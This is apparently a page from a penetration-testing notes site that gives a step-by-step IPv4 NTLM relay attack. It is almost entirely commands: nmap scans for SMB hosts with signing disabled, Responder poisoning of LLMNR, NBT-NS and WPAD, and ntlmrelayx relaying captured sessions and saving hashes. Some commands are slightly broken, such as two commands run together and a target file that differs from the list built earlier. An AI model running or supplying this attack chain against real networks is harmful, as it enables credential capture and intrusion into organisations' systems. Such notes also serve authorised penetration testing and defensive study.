IPV4

First create a target list of hosts with SMB open:

nmap -p445 -sS -iL live_ips.txt -oA 445_scan cat 445_scan.gnmap | grep open | cut -d' ' -f2 > open_445.txt

Then find hosts with SMB signing disabled or not required:

nmap -n --script smb-security-mode.nse -p445 -iL open_445.txt -oA smb_script
sed -n '/^Nmap/h;/disabled|not/{g;p;}' smb_script.nmap | cut -d' ' -f5 > smb_disabled.txt 
nmap -n --script smb2-security-mode.nse -p445 -iL open_445.txt -oA smb_script 
sed -n '/^Nmap/h;/not required|not/{g;p;}' smb_script.nmap | cut -d' ' -f5 > smb_disabled.txt

Start poisoning NBT-NS, BROWSER, LLMNR, DHCP and WPAD:

responder -I eth0 -wd

Finally relay poisoned sessions to the target list:

ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support -of hashes2

PreviousRelays NextIPV6 With MITM6

Last updated 2 years ago

Was this helpful?